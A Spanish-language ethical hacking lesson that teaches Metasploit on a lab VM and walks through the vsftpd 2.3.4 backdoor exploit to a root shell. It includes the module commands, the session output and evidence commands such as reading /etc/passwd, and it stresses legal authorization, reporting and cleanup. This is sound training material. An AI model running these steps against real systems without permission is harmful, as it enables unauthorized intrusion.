¿Cuántos sistemas vulnerables existen en este momento en México? Según el Instituto Nacional de Ciberseguridad, más del 60% de las empresas medianas del país tienen al menos un servicio expuesto con una vulnerabilidad conocida y parcheable. La mayoría llevan meses sin actualizarse.
La diferencia entre saber que hay un hoyo y cruzarlo
Antes de continuar, hazte esta pregunta: ¿cuál es la diferencia entre encontrar una vulnerabilidad y explotarla?
Muchos estudiantes creen que son lo mismo. No lo son. En la lección anterior aprendiste a escanear con Nmap y cruzar versiones contra bases de datos de CVEs. Eso es reconocimiento. La explotación es el siguiente paso: convertir ese conocimiento en acceso real.
La explotación de vulnerabilidades es el proceso de usar una falla de seguridad conocida para obtener acceso no autorizado a un sistema dentro de un entorno controlado y con permiso escrito.
Esa última parte no es opcional. Un auditor ético sin contrato firmado no es un hacker ético: es un delincuente. El artículo 211 bis del Código Penal Federal mexicano aplica igual aquí que en el escaneo. Nunca lo olvides.
El modelo Vulnerabilidad-Exploit-Payload
Para entender Metasploit necesitas dominar tres conceptos que forman el Marco VEP (Vulnerabilidad, Exploit, Payload).
Vulnerabilidad es la falla. Por ejemplo: el servidor web de una empresa usa Apache 2.4.49, que tiene el CVE-2021-41773, una falla de path traversal que permite leer archivos del sistema sin autenticación.
Exploit es el código que aprovecha esa falla. Es como una llave diseñada para una cerradura específica. Si la versión del software no coincide exactamente, el exploit falla o, peor, hace crashear el sistema.
Payload es lo que quieres que ocurra después de entrar. Puede ser abrir una terminal remota, crear un usuario, o simplemente capturar una pantalla como evidencia para tu reporte.
Metasploit organiza estos tres elementos en un flujo secuencial. Primero seleccionas el exploit. Luego configuras el payload. Finalmente ejecutas y observas el resultado.
¿Qué es Metasploit y por qué lo usan los profesionales?
Metasploit es el framework de explotación más usado en el mundo. Según el reporte anual de Rapid7 de 2023, contiene más de 2,300 módulos de exploits activos y es utilizado por más del 45% de los pentesters certificados a nivel global.
No es una herramienta para novatos que quieren "hackear por diversión". Es un sistema profesional que requiere entender qué haces en cada paso. Una empresa como FEMSA o Liverpool que contrata una auditoría de seguridad espera que uses Metasploit con precisión quirúrgica, no al azar.
Metasploit viene preinstalado en Kali Linux. Si seguiste la configuración de laboratorio de lecciones anteriores, ya lo tienes disponible.
El flujo básico de Metasploit paso a paso
Vamos a trabajar con un laboratorio controlado. Para esto necesitas dos máquinas virtuales: Kali Linux (atacante) y Metasploitable2 (objetivo). Metasploitable2 es una VM diseñada específicamente para practicar. Nunca uses estos comandos contra sistemas reales sin contrato.
Paso 1: Iniciar Metasploit
Abre una terminal en Kali y escribe:
msfconsole
Verás una pantalla con arte ASCII y el prompt msf6 >. Ese es tu punto de partida.
Paso 2: Buscar un exploit
Supón que Nmap detectó que el objetivo corre vsftpd 2.3.4, un servidor FTP con una backdoor conocida (CVE-2011-2523). Busca el módulo:
search vsftpd 2.3.4
Metasploit responde con algo así:
Matching Modules
================
# Name Disclosure Date Rank Description
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
El campo Rank es crítico. excellent significa que el exploit es estable y muy poco probable que haga crashear el servicio. En una auditoría real, nunca uses exploits con rank low o manual sin autorización explícita del cliente.
Paso 3: Seleccionar y configurar el exploit
use exploit/unix/ftp/vsftpd_234_backdoor
show options
Verás las opciones requeridas:
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s)
RPORT 21 yes The target port
Configura la IP de tu máquina Metasploitable2. Supón que es 192.168.1.105:
set RHOSTS 192.168.1.105
Paso 4: Seleccionar el payload
Este exploit en particular abre una shell directamente, así que el payload ya está integrado. Pero en muchos otros exploits debes elegirlo:
set PAYLOAD cmd/unix/interact
Paso 5: Ejecutar
exploit
Si todo funciona, verás:
[*] 192.168.1.105:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.105:21 - USER: 331 Please specify the password.
[+] 192.168.1.105:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened
id
uid=0(root) gid=0(root)
Tienes acceso root. En un entorno real, esto significa que el auditor puede leer archivos confidenciales, modificar configuraciones, o instalar malware. En tu laboratorio, significa que el ejercicio fue exitoso.
¿Qué haces con ese acceso? El reporte es todo
Aquí está el error que cometen el 80% de los estudiantes: creen que el objetivo es "entrar". El objetivo real es documentar.
Una empresa de logística mediana en Guadalajara que paga $25,000 al mes por una auditoría no quiere saber que "entraste". Quiere saber: ¿qué información estaba expuesta?, ¿cuánto tiempo llevaría un atacante real en hacer daño?, ¿cómo se soluciona?
Dentro de Metasploit, después de obtener acceso, ejecuta comandos de evidencia:
uname -a
cat /etc/passwd
ifconfig
Captura cada salida. Toma capturas de pantalla. Anota la hora exacta. Todo esto va en tu reporte técnico con la sección "Evidencia de explotación".
Errores comunes que dañan auditorías reales
Existen tres errores que pueden arruinar una auditoría profesional, incluso con el contrato firmado.
Error 1: Usar exploits con rank bajo sin advertir al cliente. Un exploit inestable puede tirar un servidor de producción. Si el servidor de pagos de una empresa cae durante la auditoría, el costo puede superar los $500,000 en pérdidas por tiempo de inactividad. Siempre revisa el rank y comunica el riesgo antes de ejecutar.
Error 2: No verificar la versión exacta. Metasploit tiene exploits muy específicos. Si el CVE aplica a Apache 2.4.49 y el objetivo corre 2.4.50, el exploit fallará. Peor aún, puede generar comportamiento inesperado. Regresa a Nmap y confirma la versión con -sV antes de seleccionar el módulo.
Error 3: Olvidar limpiar rastros en auditorías autorizadas. Un pentester profesional debe documentar qué dejó en el sistema y eliminarlo al terminar. Si instalaste una shell persistente como prueba de concepto, debes eliminarla. Dejar backdoors aunque sea "de prueba" es una negligencia grave que puede costarte el cliente y tu reputación.
Metasploit en el mercado laboral mexicano
Según datos de OCCMundial de 2024, los perfiles de ethical hacking con dominio de Metasploit en México tienen salarios promedio de entre $18,500 y $28,000 al mes en empresas del sector financiero y retail. Empresas como Mercado Libre y FEMSA buscan analistas que puedan ejecutar pruebas de penetración completas, no solo escaneos.
El dominio de Metasploit no es el punto final. Es la puerta de entrada a especializaciones como red teaming, análisis de malware y respuesta a incidentes, donde los salarios superan los $35,000 mensualmente.
Lo que aprendiste hoy
La explotación de vulnerabilidades es la fase donde el conocimiento se convierte en acceso real. Metasploit organiza ese proceso en tres elementos: el exploit que aprovecha la falla, el payload que define qué ocurre después, y la configuración precisa que hace que todo funcione.
Pero el verdadero trabajo profesional no está en "entrar". Está en documentar con precisión, comunicar el riesgo con claridad, y limpiar lo que dejaste. Eso es lo que diferencia a un hacker ético certificado de alguien que simplemente sabe usar una herramienta.